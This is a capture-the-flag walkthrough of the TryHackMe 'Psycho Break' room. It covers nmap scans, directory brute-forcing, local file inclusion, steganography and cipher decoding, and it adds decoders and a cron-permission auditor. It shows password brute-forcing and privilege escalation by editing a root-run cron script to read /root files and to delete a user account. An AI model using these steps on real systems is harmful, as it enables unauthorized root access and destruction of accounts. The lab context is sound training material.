This is my first time joining the hacking game. To be honest, it is quite fun and I learned a lot from this game, even though it took me 16 hours to complete. LOL
Link to room : https://tryhackme.com/room/psychobreak
So, let's get started.
First, I need to find how many ports are open on the target machine.
# nmap 10.10.X.X
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:18 +08
Nmap scan report for 10.10.X.X
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.40 seconds
Now, which OS is the target machine running? Let's find out.
# nmap -A -Pn -T4 10.10.X.X
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:27 +08
Nmap scan report for 10.10.X.X
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.16 seconds
Done. So, now I know all the info about the machine.
When I open the IP in the browser, this page shows up.
The task is to find the key and access the locker room. Hmmm..
There is a hint in the source code. Let's dig into it.
Alright, found the key. There is a timer to enter the locker room. Need to hurry.
There is another blocker. I need to decode this piece of text “Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv” and get the key to access the map. It looks like a Caesar-style substitution cipher, but it isn't one. So I tried an online cipher detector: it's actually the Atbash cipher, where every letter is swapped with its mirror in the alphabet (a with z, b with y, and so on). Now I managed to decode it, so let's open the map.
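Atbash is simple enough to do without an online tool. The decoder below is an added example, not code from the original post: it builds the mirror-alphabet translation table with the standard library, applies it to the ciphertext quoted above, and includes a small sanity check that plays the role of the "cipher detector" (does the result contain common English words?). Because the mapping is its own inverse, the same function encrypts and decrypts.

```python
import string

# Ciphertext quoted in the room; underscores are not letters and pass through unchanged.
CIPHERTEXT = "Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv"

# Atbash maps each letter to its mirror image in the alphabet (a<->z, b<->y, ...),
# for both cases, so one table both encrypts and decrypts.
_LOWER = string.ascii_lowercase
_UPPER = string.ascii_uppercase
ATBASH_TABLE = str.maketrans(_LOWER + _UPPER, _LOWER[::-1] + _UPPER[::-1])


def atbash(text):
    """Apply the Atbash substitution. Letters keep their case; other characters are untouched."""
    return text.translate(ATBASH_TABLE)


def looks_like_atbash(ciphertext, words=("the", "and", "to", "me", "please")):
    """Cheap sanity check, like what an online cipher detector does before you trust a result:
    does the Atbash image of the text contain common English words?"""
    decoded = atbash(ciphertext).lower().replace("_", " ")
    padded = f" {decoded} "
    return any(f" {w} " in padded for w in words)


if __name__ == "__main__":
    print(atbash(CIPHERTEXT))
    print("plausible Atbash:", looks_like_atbash(CIPHERTEXT))
```

Running the block prints the decoded key from the room; `atbash(atbash(x))` returns `x` for any input, which is the quick way to confirm the table is built correctly.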
No. 1 and No. 2 are completed. Now let's see No. 3: Safe Heaven.
The Safe Heaven room shows nothing and Room No. 4 is locked. It needs the keeper key, so there must be something here. Using the same method, I inspect the page first.
The hint asks to search throughout this page. It must be a hidden directory. I start digging with gobuster and dirb at the same time to brute-force all the directories:
# gobuster -w WORDLIST_PATH -u http://10.10.X.X/SafeHeaven/ -t 100
# dirb http://10.10.X.X/SafeHeaven/ WORDLIST_PATH
By using the dirbuster wordlist, I manage to find the hidden page.
This page shows up and I need to be fast. I need to find out where exactly this place is.
There is a hint in the code. I need to use Google Images and find it.
The keeper key is revealed. Now I can proceed to Room 4: Abandoned Room.
Okay.. Creepy ass room over here. Let's go further then.
Oh Sh*t, another race against time (the timer can be reset if you refresh the page). Inspect the page to see any hint.
The hint tells there is something called “shell” in the current page. There is no input at all, so I'm guessing it is some parameter to be passed in the URL. I go for an LFI attack.
It actually gives the list of files. After several attempts, I finally get the hidden directory.
There are 3 files from the LFI. Replace the URL with the first directory found.
Tada~~. There are some files showing in the directory listing.
To proceed, I need to download and extract them.
# wget URL_PATH
# unzip helpme.zip
I find out that Table.jpg cannot be previewed. It must have the wrong extension. I simply run
# file Table.jpg
Table.jpg: Zip archive data, at least v2.0 to extract
Luckily, it's clearly stated that it is a ZIP file. Extract it:
# unzip Table.jpg
When I hear key.wav, it sounds like Morse code because of the “bip bip” sound. So, using an online Morse code decoder, I get the key. After a while, it turns out the key actually shows a hint and I need to reveal something. There are only 2 files from Table.jpg, so there must be something hidden in the Jopesh_Oda.jpg image. I tried an online steganographic decoder and it worked.
The message shows the credentials for the FTP site. Hmm.. interesting..
Crack it Open
So let's dig into the FTP site. Using WinSCP, I see there are 2 files and I downloaded them.
# file program
program: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped
Oh! It's an executable file. Let's run it.
Hmm.. so the program needs 1 parameter.
# ./program hello
hello => Incorrect
Okay, now I know how it works. I need to use the dictionary file given and brute-force it. Let's create a simple Python script (DICTIONARY_PATH is the path of the wordlist from the challenge):
import subprocess
with open(DICTIONARY_PATH) as lines:
    for password in lines:
        password = password.strip()
        output = subprocess.check_output(["./program", password]).decode()  # bytes -> str in Python 3
        if "incorrect" in output.lower():
            print(password + " is Wrong")
        else:
            print(output.strip())  # correct word found, print the program's response
            break
Let's run it:
00000 is Wrong
####### => Correct
Decode this => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33
Another cipher. The cipher detector also wasn't able to detect what cipher it is, so guessing is the last choice.
You know what.. This code took longer than the first one. Haha.. It's actually a phone keypad (multi-tap) code: each digit is a key and the number of repeats picks the letter. “abc — def — ghi — jkl — mno — pqrs — tuv — wxyz” dammit.
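A multi-tap decoder is a few lines once you know the layout. The block below is an added example, not code from the original post: it decodes the space-separated tokens quoted above against the standard 2-9 keypad, rejects tokens that cannot come from a keypad (so a wrong guess about the cipher fails loudly instead of producing garbage), and includes the inverse encoder so a decode can be checked by round-tripping it.

```python
import re

# Cipher quoted in the room: each token is one key pressed repeatedly, tokens separated by spaces.
CIPHERTEXT = ("55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 "
              "7777 7777 666 7777 8 777 2 66 4 33")

# Standard letter layout on a phone keypad (the one the post quotes).
KEYPAD = {
    "2": "abc", "3": "def", "4": "ghi", "5": "jkl",
    "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz",
}

# Reverse table for the encoder: 'a' -> '2', 'b' -> '22', 's' -> '7777', ...
_REVERSE = {ch: key * (i + 1) for key, chars in KEYPAD.items() for i, ch in enumerate(chars)}
_REVERSE[" "] = "0"


def decode_multitap(text):
    """Decode space-separated multi-tap tokens. '0' is read as a space.
    Raises ValueError for anything a keypad could not have produced."""
    out = []
    for token in text.split():
        if token == "0":
            out.append(" ")
            continue
        # a valid token is one digit 2-9 repeated one or more times
        if not re.fullmatch(r"([2-9])\1*", token):
            raise ValueError(f"not a multi-tap token: {token!r}")
        letters = KEYPAD[token[0]]
        presses = len(token)
        if presses > len(letters):
            raise ValueError(f"key {token[0]} has {len(letters)} letters, got {presses} presses")
        out.append(letters[presses - 1])
    return "".join(out)


def encode_multitap(text):
    """Inverse of decode_multitap, used to confirm a decode round-trips."""
    return " ".join(_REVERSE[ch] for ch in text.lower())


if __name__ == "__main__":
    plain = decode_multitap(CIPHERTEXT)
    print(plain)
    print("round trip ok:", encode_multitap(plain) == CIPHERTEXT)
```

Running the block prints the decoded string from the room and confirms that re-encoding it reproduces the original tokens exactly.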
Go Capture the flag
So, move on to the next stage: SSH!
At first, I tried to brute-force the server using hydra. It took hours but failed with 2 different password dictionaries. Then I tried using the previously found key as the username and the decrypted cipher as the password.
# ssh USERNAME@10.10.X.X
Yay! Success. The first thing I usually do is list all files in the current directory.
# ls -al
...
-rw-rw-r-- 1 kidman kidman 264 Aug 13 2020 .readThis.txt
-rw-r--r-- 1 root root 19 Feb 26 16:36 .the_eye.txt
-rw-rw-r-- 1 kidman kidman 33 Jul 13 2020 user.txt
Let's see user.txt.
# cat user.txt
When I open .readThis.txt, it's encrypted, but it must be from a cipher family too. I still don't know what cipher it uses, so I'm unable to decode it. Hmmm.. But there is something going on with .the_eye.txt. I notice that its content changes every few minutes. The first thing that comes to mind is the cron scheduler.
# crontab -e
But nothing is found there. So, I need to search all the files on the machine to find which file changes .the_eye.txt:
# grep -rs "the_eye" /
And found it. It's a Python file run by root. Since I don't know how to do a reverse shell, I do it the traditional way: edit the Python file so it runs a command and writes the result to a file I can read.
subprocess.call("ls -al /root > root_list_files.txt", shell=True)
Oh.. there is root.txt in it. So..
subprocess.call("cat /root/root.txt > root.txt", shell=True)
Now root.txt is revealed
# cat /root.txt
Lastly, I need to delete ruvik. Same process, edit the Python file again:
subprocess.call("deluser -r ruvik && killall -u ruvik && userdel -f ruvik", shell=True)
Oh yeah~~ We have completed the mission!
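The root step above works only because a script that root's cron runs every few minutes can be edited by a non-root user. That is exactly the kind of misconfiguration a sysadmin can audit for. The following is an added example from the defender's side, not code from the room or the original post: it parses system-crontab lines (the /etc/crontab format with a user field), works out which file each root job really executes (the first argument when the command is an interpreter such as python3), and flags any that are group- or world-writable. The crontab text, the script name `cron_job.py` and the `demo()` helper are constructed for the example; `demo()` creates a throwaway world-writable script in a temporary directory, shows it being flagged, tightens the mode and shows the finding disappear.

```python
import os
import stat
import tempfile

# Constructed sample in /etc/crontab format (five schedule fields, user, then the command).
# The {script} slot is filled in by demo() with a throwaway file.
SAMPLE_CRONTAB = """\
# m  h  dom mon dow user  command
*/2 *  *   *   *   root  /usr/bin/python3 {script}
0   3  *   *   *   root  /usr/local/bin/backup.sh
"""

# When a cron command starts with an interpreter, the file that matters is its first argument.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}


def script_path(command):
    """Return the file a cron command really executes."""
    parts = command.split()
    if not parts:
        return None
    if os.path.basename(parts[0]) in INTERPRETERS and len(parts) > 1:
        return parts[1]
    return parts[0]


def writable_by_non_root(path):
    """True when the group or world write bit is set on the file: the weak setting that lets
    an unprivileged user change what root's cron job executes."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False  # a missing target is a different problem and is not flagged here
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_risky_cron_jobs(crontab_text):
    """Return the script paths of root jobs that non-root users could modify."""
    risky = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # not a system-crontab line (no user field)
        user, command = fields[5], fields[6]
        path = script_path(command)
        if user == "root" and path and writable_by_non_root(path):
            risky.append(path)
    return risky


def demo():
    """Create a world-writable script, audit it, tighten its mode, audit again.
    Returns (findings_before, findings_after)."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "cron_job.py")  # constructed name, not the room's file
        with open(script, "w") as fh:
            fh.write("print('tick')\n")
        os.chmod(script, 0o666)  # weak setting: anyone on the box can edit it
        before = find_risky_cron_jobs(SAMPLE_CRONTAB.format(script=script))
        os.chmod(script, 0o755)  # corrected setting: only the file owner can write
        after = find_risky_cron_jobs(SAMPLE_CRONTAB.format(script=script))
        return len(before), len(after)


if __name__ == "__main__":
    for path in find_risky_cron_jobs(SAMPLE_CRONTAB.format(script="/opt/example.py")):
        print("root cron job runs a file writable by non-root users:", path)
    print("demo (before, after):", demo())
```

On a real host you would feed `find_risky_cron_jobs` the contents of /etc/crontab and the files under /etc/cron.d; ownership of the script and of its parent directory deserve the same review, since a directory the user can write to lets them replace the file rather than edit it.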